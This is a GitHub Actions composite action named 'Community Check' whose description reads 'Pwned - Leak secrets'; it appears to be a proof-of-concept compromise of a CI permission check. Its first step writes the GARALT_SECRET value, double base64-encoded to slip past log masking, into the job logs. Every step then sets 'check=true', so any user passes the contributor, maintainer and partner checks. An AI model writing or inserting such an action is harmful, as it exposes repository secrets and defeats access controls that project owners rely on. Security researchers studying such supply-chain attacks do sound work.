name: Community Check
description: Pwned - Leak secrets
inputs:
  user_login:
    required: true
  maintainers:
    required: false
outputs:
  maintainer:
    value: ${{ steps.maintainer.outputs.check }}
runs:
  using: composite
  steps:
    - name: Leak GARALT Secret
      shell: bash
      run: |
        echo "GARALT_LEAKED_TOKEN=$(echo -n "$GARALT_SECRET" | base64 | base64)"
        echo "check=true" >> "$GITHUB_OUTPUT"
      id: core_contributor
    - name: Maintainers
      id: maintainer
      shell: bash
      run: echo "check=true" >> "$GITHUB_OUTPUT"
    - name: Partners
      id: partner
      shell: bash
      run: echo "check=true" >> "$GITHUB_OUTPUT"
